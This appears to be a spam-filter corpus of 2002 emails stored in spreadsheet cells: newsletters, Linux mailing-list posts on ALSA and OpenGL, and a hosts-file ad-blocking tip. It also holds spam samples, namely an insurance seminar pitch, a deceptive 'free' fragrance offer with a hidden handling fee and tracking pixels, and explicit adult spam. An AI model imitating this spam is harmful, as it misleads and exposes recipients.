 Vivendi Will Move Quickly to Sell Many Assets&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/09/26/business/26VIVE.html"&gt;http://www.nytimes.com/2002/09/26/business/26VIVE.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 What's New at Vivendi? Depends Who's Talking&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/09/26/business/26PLAC.html"&gt;http://www.nytimes.com/2002/09/26/business/26PLAC.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Vivendi in Move to Sell Raft of Assets (Financial Times)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1ncq"&gt;http://tinyurl.com/1ncq&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Vivendi Board to Deny Messier Severance Pay (Financial Times)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1ncs"&gt;http://tinyurl.com/1ncs&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Lex: Vivendi Universal (Financial Times) &lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1ncw"&gt;http://tinyurl.com/1ncw&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 News Corp Counters Report of Telepiu Sale (Financial Times)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1ncy"&gt;http://tinyurl.com/1ncy&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Vivendi Aims to Realise Eu12bn from Asset Sales (Daily Telegraph)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1nd0"&gt;http://tinyurl.com/1nd0&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Messier 'won't get a penny' &lt;br&gt;
 &lt;A HREF="http://media.guardian.co.uk/city/story/0,7497,799283,00.html"&gt;http://media.guardian.co.uk/city/story/0,7497,799283,00.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Vivendi Shakes Up Board, Denies Messier's Severance&lt;br&gt;
 &lt;A HREF="http://www.latimes.com/business/la-fi-vivendi26sep26,0,481695.story"&gt;http://www.latimes.com/business/la-fi-vivendi26sep26,0,481695.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Enron Auctions Off Furniture and Famous 'E'&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/09/26/business/26ENRO.html"&gt;http://www.nytimes.com/2002/09/26/business/26ENRO.html&lt;/A&gt; &lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 	&lt;a name="a96668"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Other Stories
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;HP Boosts Layoffs By 1,800&lt;br&gt;
 &lt;A HREF="http://www.siliconvalley.com/mld/siliconvalley/4151819.htm"&gt;http://www.siliconvalley.com/mld/siliconvalley/4151819.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Former WorldCom Controller To Plead Guilty To Two counts (Wall Street Journal)&lt;br&gt;
 &lt;A HREF="http://www.msnbc.com/news/813048.asp"&gt;http://www.msnbc.com/news/813048.asp&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Tyco Rewarded an Executive During a Grand Jury Inquiry&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/09/26/business/26PAY.html"&gt;http://www.nytimes.com/2002/09/26/business/26PAY.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Bell Labs Researcher Falsified Experiments (AP)&lt;br&gt;
 &lt;A HREF="http://www.chron.com/cs/CDA/story.hts/tech/news/1591103"&gt;http://www.chron.com/cs/CDA/story.hts/tech/news/1591103&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Germany's Neuer Markt to close&lt;br&gt;
 &lt;A HREF="http://news.bbc.co.uk/2/hi/business/2283068.stm"&gt;http://news.bbc.co.uk/2/hi/business/2283068.stm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Resources Dry Up As Joblessness Drags On (USA Today)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1nc1"&gt;http://tinyurl.com/1nc1&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Merrill Aide to Plead Guilty (Wall Street Journal)&lt;br&gt;
 &lt;A HREF="http://www.msnbc.com/news/813195.asp?0dm=B21AB"&gt;http://www.msnbc.com/news/813195.asp?0dm=B21AB&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Enron Ex-CFO Clears His Throat For Feds &lt;br&gt;
 &lt;A HREF="http://www.nypost.com/business/57905.htm"&gt;http://www.nypost.com/business/57905.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Music Labels Seek Piracy Payback&lt;br&gt;
 &lt;A HREF="http://www.latimes.com/business/la-fi-napster26sep26001431,0,388519.story"&gt;http://www.latimes.com/business/la-fi-napster26sep26001431,0,388519.story&lt;/A&gt; &lt;/P&gt;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Marketing: Cowpoke Productions (&lt;a href="http://www.cowpokeproductions.com"&gt;cowpokeproductions.com&lt;/a&gt;).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value="http://newsletter.mediaunspun.com/index000020868.cfm"&gt;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 &lt;font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&lt;!-- 3,4:article_view --&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td
 bgcolor="#000000"&gt;
 	&lt;font face="arial" size="2" color="#FFFFFF"&gt;&lt;b&gt;
 		&lt;CENTER&gt;Advertisement&lt;/CENTER&gt;
 	&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#FFFFFF"&gt;
 	&lt;TABLE bgcolor="#FFFFFF" border="0" cellpadding="3" cellspacing="0" width="100%"&gt;
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 				&lt;a href="http://www.poptech.org"&gt;&lt;img src="http://a298.g.akamai.net/7/298/5382/092602092354/www.imakenews.com/mediaunspun/mediaunspun_e_a000089486.JPG" BORDER="0" alt="" hspace="5" vspace="1" align="top"&gt;&lt;/a&gt;
 				&lt;br&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 3 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table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000020868.cfm&amp;XXDESXXissue_id=20868&amp;XXDESXXtitle=Media%20Unspun"
 			 class="a269926923549919-footer_tellafriend"&gt;
 			&lt;font size=4&gt;Tell a Friend...&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;/td&gt;
 	  &lt;/tr&gt;
 	&lt;/table&gt;&lt;/div&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 4 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;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zzz-unspun@spamassassin.taint.org &lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org"&gt;Click here&lt;/a&gt; to be instantly removed from this list.&lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Ctxt"&gt;Click here&lt;/a&gt; to receive future messages in plain text format.&lt;br&gt;&lt;/font&gt;&lt;font face="verdana,arial" size="1"&gt;&lt;a
 href="http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org"&gt;Click here&lt;/a&gt; to change your subscriber information and preferences.&lt;br&gt;&lt;/font&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!--Ver. 7--&gt;
 		&lt;p&gt;&amp;nbsp;
        &lt;img src="http://machina.imakenews.com/E215207,5114587XXmediaunspunXX20868XXXXindex000020868.cfmXXemailXX5114587XXXX0Y0XX1" alt="" height="0" width="0"&gt;		 
 		&lt;/p&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------------=_1033046883-23957-4--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: alsa-driver rebuild fails with undeclared USB symbol
</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to rebuild the recently posted ALSA driver package for my 
 kernel.  Although I run Red Hat 7.3, I am not using a Red Hat kernel 
 package: my kernel is lovingly downloaded, configured, and built by 
 hand.  Call me old fashioned.
 Sadly, the RPM rebuild fails part way through:
      % rpm --rebuild alsa-driver-0.9.0rc3-fr6.src.rpm
      gcc -DALSA_BUILD -D__KERNEL__ -DMODULE=1 \
      -I/usr/src/redhat/BUILD/alsa-driver-0.9.0rc3/include \
      -I/lib/modules/2.4.18/build/include -O2 \
      -mpreferred-stack-boundary=2 -march=i686 -DLINUX -Wall \
      -Wstrict-prototypes -fomit-frame-pointer -pipe   -DEXPORT_SYMTAB \
      -c sound.c
      sound.c:41: `snd_hack_usb_set_interface' undeclared here (not in a \
      function)
      sound.c:41: initializer element is not constant
      sound.c:41: (near initialization for \
      __ksymtab_snd_hack_usb_set_interface.value')
      make[1]: *** [sound.o] Error 1
 The line in question looks like this:
 	/* USB workaround */
 	#if LINUX_VERSION_CODE &lt; KERNEL_VERSION(2, 5, 24)
 	#if defined(CONFIG_SND_USB_AUDIO) || \
 	defined(CONFIG_SND_USB_AUDIO_MODULE) || \
 	defined(CONFIG_SND_USB_MIDI) || \
 	defined(CONFIG_SND_USB_MIDI_MODULE)
 -41-&gt; 
 EXPORT_SYMBOL(snd_hack_usb_set_interface);
 	#endif
 	#endif
 Any suggestions?
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: OpenGL
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi.
 John Hinsley &lt;johnhinsley@blueyonder.co.uk&gt; wrote:
 &gt; Querying the rpm database for OpenGL gets me nowhere fast. Can anyone
 &gt; point me in the right direction? What, in RedHat, provides OpenGL?
 The X server itself does (or does not, depending on your driver). There
 is a software fallback called Mesa compiled in the X server, which
 is used as a fallback. So, if you have installed X, you have OpenGL.
 Try the glxinfo command to see the capabilities provided by your
 X system.
 -- 
 R!
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: When we say FREE, WE MEAN FREE!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_295635_01C23C9D.8D2947A0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  When we say FREE Turnkey Selling System WE MEAN FREE!
 =20
  Get your demo disc today!=0A=
 No place to fly to, no meetings to attend!=09
 Total Turnkey System!	 High Quality Leads From
 Proven Mail Houses!	 Attractive Invitations With a=20
 2-3% Average Response!	=20
 Toll-free Reservation Hotline For Seminar Attendees!	 Nationally
 Tested - Compliance Approved Materials!	 Professional, Entertaining &amp;
 Informative PowerPoint Presentations!	=20
 Free Multi-Media Loaner Equipment Including=20
 Lap-Top &amp; Projector!	 Two Fool Proof Appointment Systems ? 50%
 Response Ratio!	 Free Full Two Days of Complete Training!	=20
 Continuous Coaching From
 Experienced Seminar Presenters!	 Attendance At Your Seminars By Your Own
 Seminar Coach!	 Large Range Of Top Companies &amp; Products To Work With!
 NO Commission Reductions, Splits or Lower Contracts!	 Paid Premium
 Counts Towards Eligibility For
 5-Star, In-Season Trips!	 Co-op Dollars Available!	=20
   _____ =20
 Combine your Life, Annuity, LTC, DI &amp; Securities=20
 Production And Have A ?Suite? Time On=20
 Our 7 - day All Suite Alaskan Adventure on Celebrity Cruises=AE
 &gt;&gt;From as little as $1,000,000 of Annuity Premium or $100,000 of Life
 Premium.
 No case minimums!*
   _____ =20
 Call or e-mail &lt;mailto:seminarpartners@rosterfinancial.com&gt;  us today
 for your FREE demo disc!
  800-933-6632x8
 ? or ?
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 =20
 =20
 *See Trip Brochure For Qualification Levels And Full Details.	=20
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insurancemail.net &lt;http://www.Insurancemail.net&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_295635_01C23C9D.8D2947A0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;When we say FREE, WE MEAN FREE!&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF" border=3D"1" =
 bordercolor=3D"#000000"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;&lt;img src=3D"http://www.iiq.us/images/roster/20020618-101d.gif" =
 width=3D"550" height=3D"102" alt=3D"When we say FREE Turnkey Selling =
 System WE MEAN FREE!"&gt;&lt;br&gt;
       &lt;img src=3D"http://www.iiq.us/images/roster/20020618-102d.jpg" =
 width=3D"550" height=3D"161"&gt;&lt;br&gt;
       &lt;img src=3D"http://www.iiq.us/images/roster/20020618-103d.gif" =
 width=3D"550" height=3D"67" alt=3D"Get your demo disc today!&amp;#10;No =
 place to fly to, no meetings to attend!"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;table width=3D"100%" border=3D"1" cellspacing=3D"0" =
 cellpadding=3D"2" bordercolor=3D"#000000" bgcolor=3D"#FF9900"&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt;Total Turnkey =
 System!&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt;High Quality Leads =
 From&lt;br&gt;Proven Mail Houses!&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt;Attractive =
 Invitations With a &lt;br&gt;2-3% Average Response!&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt; Toll-free =
 Reservation Hotline For Seminar Attendees!&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt;Nationally Tested - =
 Compliance Approved Materials!&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt;Professional, =
 Entertaining &amp;amp; Informative PowerPoint Presentations!&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt;Free Multi-Media =
 Loaner Equipment Including &lt;br&gt;Lap-Top &amp;amp; Projector!&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt;Two Fool Proof =
 Appointment Systems &amp;#150; 50% Response Ratio!&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt;Free Full Two Days of =
 Complete Training!&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt;Continuous Coaching =
 From&lt;br&gt;Experienced Seminar Presenters!&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt;Attendance At Your =
 Seminars By Your Own Seminar Coach!&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt;Large Range Of Top =
 Companies &amp;amp; Products To Work With!&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt;NO Commission =
 Reductions, Splits or Lower Contracts!&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt;Paid Premium Counts =
 Towards Eligibility For&lt;br&gt; 5-Star, In-Season Trips!&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"33%"&gt;&lt;font size=3D"2"&gt;Co-op Dollars =
 Available!&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;hr width=3D"98%" size=3D"1"&gt;
             &lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;
             Combine your Life, Annuity, LTC, DI &amp;amp; Securities &lt;br&gt;
             Production And Have A &amp;#147;Suite&amp;#148; Time On&lt;/font&gt;&lt;/b&gt; =
 &lt;br&gt;
             &lt;font size=3D"4" color=3D"#000099"&gt;
             Our 7 - day All Suite Alaskan Adventure on Celebrity =
 Cruises&amp;reg;&lt;/font&gt;&lt;br&gt;
             &lt;font size=3D"2"&gt;
             From as little as $1,000,000 of Annuity Premium or $100,000 =
 of Life Premium.&lt;br&gt;
             No case minimums!*&lt;/font&gt;&lt;br&gt;
             &lt;hr width=3D"98%" size=3D"1"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font size=3D"2"&gt;&lt;b&gt;Call or &lt;a =
 href=3D"mailto:seminarpartners@rosterfinancial.com"&gt;e-mail&lt;/a&gt;=20
             us today for your FREE demo disc!&lt;br&gt;
             &lt;img src=3D"http://www.iiq.us/images/roster/20020618-2.gif" =
 width=3D"535" height=3D"119" alt=3D'800-933-6632x8'&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#cccccc"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#000000"&gt;&lt;b&gt;&lt;font size=3D"2" color=3D"#FFFFFF"&gt;Please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value=3D"seminarpartners@rosterfinancial.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"Roster Seminar Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &lt;img src=3D"http://www.iiq.us/images/roster/20020423-5.gif" =
 height=3D"81" width=3D"339"&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"center"&gt;&lt;font size=3D"1"&gt;*See Trip Brochure For =
 Qualification Levels And Full Details.&lt;/font&gt;&lt;/td&gt;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&lt;/table&gt;&lt;/font&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_295635_01C23C9D.8D2947A0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Shipment Status
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
    &lt;head&gt;&lt;title&gt;FREE* cKbe fragrance&lt;/title&gt;&lt;/head&gt;
       &lt;body&gt;
 &lt;table border="0" cellspacing="19" cellpadding="0" width="550"&gt;
   &lt;tr&gt;
     &lt;td background="http://admanmail.com/ads/adman/silvercarrot/CKLogoBG.gif"&gt;&lt;img src="http://admanmail.com/ads/adman/silvercarrot/thin.gif" width="72"&gt;&lt;/td&gt;
     &lt;td&gt;
 &lt;p&gt;&lt;h1 align="center"&gt;&lt;font size="+2" color="red"&gt;Congratulations JM@NETNOTEINC.COM!&lt;/font&gt;&lt;/h1&gt;
 &lt;p&gt;Dear JM@NETNOTEINC.COM,&lt;img src="http://admanmail.com/ads/adman/silvercarrot/ckbelogo.jpg" align="right"&gt;
 &lt;p&gt;You've been selected to receive a bottle of Calvin Klein's cKbe - &lt;b&gt;&lt;font color="red"&gt;FREE*&lt;/font&gt;&lt;/b&gt;.
 &lt;p&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=GEWDVQGNFQVN&amp;ext=1"&gt;Click here&lt;/a&gt; now for the scent that's great for both men and women.
 &lt;p&gt;It's the perfect scent to wear for any occassion. It's light, and just a little citrusy - you'll love it for Summer!  &lt;a href="http://theadmanager.com/server/c.asp?ad_key=GEWDVQGNFQVN&amp;ext=1"&gt;Click here&lt;/a&gt; now and we'll send this refreshing scent right out to you.
 &lt;p&gt;With only a few bottles on hand, I know they won't last long. Guarantee your own good fortune - and &lt;a href="http://theadmanager.com/server/c.asp?ad_key=GEWDVQGNFQVN&amp;ext=1"&gt;click here&lt;/a&gt; to claim your very own bottle of Calvin Klein's cKbe.
 &lt;p&gt;JM@NETNOTEINC.COM act now and &lt;a href="http://theadmanager.com/server/c.asp?ad_key=GEWDVQGNFQVN&amp;ext=1"&gt;click here&lt;/a&gt; for a one time only chance!
 &lt;p&gt;Sincerely,
 &lt;br&gt;&lt;img src="http://admanmail.com/ads/adman/silvercarrot/lori.gif"&gt;
 &lt;br&gt;Lori Anderson&lt;br&gt;
 YourFreePresent.com
 &lt;p&gt;P.S. Please feel free to forward this great offer to a friend!
 &lt;p&gt;&lt;font size="2"&gt;*All offers are based on 100% customer satisfaction. Yourfreepresent reserves the right to cancel this offer any time once quantities run out. A handling charge of $5.93 will be applied to each item. All merchandise and offers are based on first come first serve. Offer not valid in the state of California.&lt;/font&gt;
 &lt;/td&gt;
        &lt;/tr&gt;
 &lt;/table&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=GEWDVQGNFQVN"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</si>
  <si>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Using hosts file to rid yourself of popup ads
</t>
  </si>
  <si>
    <t xml:space="preserve">Don't know if everybody knows this trick...
 Puts 127.0.0.1 as the IP for adservers. Elegant.
 ==
 http://technoerotica.net/mylog/hostfile.html
 As mentioned throughout this site, there is more than one way to skin a cat
 when it comes to pop-ups. The hosts file is one of the most effective
 methods there is. In brief, a hosts file is a text file used by Windows to
 resolve domain names and IP addresses. If you're running windows, you
 already have a hosts file but it most likely isn't being used.
 What a hosts file does is simple, it lists domains and IP numbers. To get
 rid of ads, the hosts file lists the domain names of adservers along with
 the IP number 127.0.0.1. This tells windows to grab any content from the
 listed domain from the specified IP number. The specified IP number in this
 case is your own computer. What happens is that it won't display the ad. If
 you choose this method of ad removal there is no need to use our opt out
 links. The hosts file is a very effective mechanism.
 You can download this hosts file, unzip it and place it in your Windows
 directory. YOU SHOULD MAKE A BACK UP of your existing hosts file before you
 do. The hosts file is called "hosts" there is no extension. You may have a
 file named Hosts.sam this is merely a sample hosts file.
 Once you download the file and put it in the windows folder, reboot your
 computer and it's a done deal. Pretty simple huh? You might want to look at
 the contents of this file as it contains additional information as well as
 an address for getting updated versions. &lt;http://www.accs-net.com/hosts/&gt;
 Because we're inherently lazy, this works for windows only, don't use it on
 a mac! Follow the address in the hosts file for alternative system
 instructions.
 download now &lt;http://technoerotica.net/mylog/hosts.zip&gt;
 We didn't write this file and do not provide support for it's use. Follow
 the address in the hosts file for questions. It's not that we don't want to
 hear from you but the folks at this address have the answers you need.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Look What Sandy is Doing in her DORM!!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;&lt;body&gt;
 &lt;center&gt;
 &lt;table bgcolor=3D"#000000" border=3D"0" width=3D"999" cellspacing=3D"0" ce=
 llpadding=3D"0"&gt;
   &lt;tr&gt;
     &lt;td colspan=3D"3" width=3D"999"&gt; &lt;hr&gt;&lt;font color=3D"#FFFFFF"&gt;
 &lt;font size=3D"6"&gt;&lt;br&gt;
 &lt;center&gt;
 &lt;font color=3D"#FFFF00"&gt;
 This WEEK: Sydney &lt;B&gt;Bares ALL&lt;/b&gt; in the park!&lt;br&gt;&lt;br&gt;
 &lt;font color=3D"#FFFFFF"&gt;
 Join her in our Live Teen Chat!&lt;br&gt;&lt;br&gt;
 &lt;font color=3D"#FFFF00"&gt;
 Watch as Sandy &lt;b&gt;Strips Naked &lt;/b&gt;in her &lt;b&gt;Dorm&lt;/b&gt;!&lt;br&gt;&lt;br&gt;
 &lt;font color=3D"#FFFFFF"&gt;
 Best of All, see it 
 &lt;font size=3D"7"&gt;
 &lt;a href=3D"http://81.29.4.12/u001s76/index.php"&gt;
 ALL 4 FREE!&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"6"&gt;
 Don't Miss Out! &lt;br&gt;&lt;br&gt;
 &lt;font color=3D"#FFFF00"&gt;
 Watch in Awe as Stacey &lt;b&gt;Suck-Starts Ken&lt;/b&gt;!&lt;br&gt;&lt;br&gt;
 &lt;font color=3D"#FF0000"&gt;
 &lt;b&gt;&lt;font size=3D"7"&gt;
 AND OUR BONUS:&lt;br&gt;&lt;font size=3D"6"&gt;&lt;br&gt;
 Pam &amp; Tommy UNCUT!&lt;br&gt;
 Penthouse Forum Stories!&lt;br&gt;
 Jenna Jamieson in JennaMaxx!!&lt;br&gt;&lt;br&gt;
 &lt;font color=3D"#FFFFFF"&gt;
 &lt;/b&gt;
 &lt;font size=3D"7"&gt;
 Get in here for&lt;a href=3D"http://81.29.4.12/u001s79/index.php"&gt; FREE NOW!&lt;=
 /a&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: This week: Marine Aquarium, QuickTime, MoonDock
</t>
  </si>
  <si>
    <t xml:space="preserve">CNET | DOWNLOAD DISPATCH(Mac Edition)
 July 16, 2002
 Vol. 7, No. 28
 A Screen Dream
 Good Mac screensavers are hard to come by. And screensavers are
 important: not only do they preserve your screen quality, but
 they can also turn your monitor into a conversation piece.
 Marine Aquarium, our Pick of the Week, will turn your desktop
 into a virtual tropical fish aquarium that will make your Mac
 turn some heads. No need to feed:
 http://clickthru.online.com/Click?q=c2-oXxLQUEkRh6pmyFgVnxXFZcIuInR 
 Also this week, we've got QuickTime 6, the media player's long-
 awaited first foray into MPEG-4 technology; Cartoon Editor, a
 graphic editor that will help you make QuickTime cartoons;
 MoonDock, so you can keep track of moon phases on your desktop;
 WebDesign, a full-featured HTML editor with lots of extras; and
 Sigma Chess Lite, so you can challenge your mind and develop
 your skills at the ancient game of chess.
 Enjoy!
 Jason Parker
 Assistant Editor, CNET Download.com
 --
 (Unsubscribe instructions are at the bottom of this
 newsletter.)
 &lt;---------------Advertisement---------------&gt;
 Gateway High Performance Desktops - starting at $699!
 High Performance, the 500 Series goes beyond the basics and
 features some of the latest technology.  With new sleek
 platinum cases, systems include Intel(R) Pentium(R) 4
 processors, USB 2.0 support, Mid-Tower chassis, Broadband
 Ready and Microsoft(R) Windows(R)XP.  Click here for details!
 http://clickthru.online.com/Click?q=d7-wk3ZQLWkDhLMkvyRmBekeVktk2eR 
 &lt;-------------------------------------------&gt;
 IN THIS ISSUE:
 1. This Week's Top 10 Downloads
 2. Pick of the Week: Marine Aquarium
 3. The Week in Wares:
               - Multimedia and design: QuickTime, Cartoon Editor
               - Home and education: MoonDock
               - Development tools: WebDesign
               - Games: Sigma Chess Lite
 4. Updates &amp; Drivers
 5. The Week in Reviews: A TiVo-like toy for the Mac?
 6. Overheard on Download.com
 7. Download.com Outage Notice
 P.S. Got a suggestion for CNET Download.com? Send it to:
 suggestions@download.com
 _____________________________________________________________
 1. This Week's Top 10 Downloads
    1. LimeWire 2.4.4                         6,190 downloads
    2. LimeWire (OS X) 2.4.4                  4,561 downloads
    3. MacSatellite  1.6.1                    4,313 downloads
    4. Hotline Connect Client 1.8.5           3,656 downloads
    5. RealPlayer 8.0                         2,939 downloads
    6. Deck 3.5                               2,908 downloads
    7. Fetch 4.0.1                            2,333 downloads
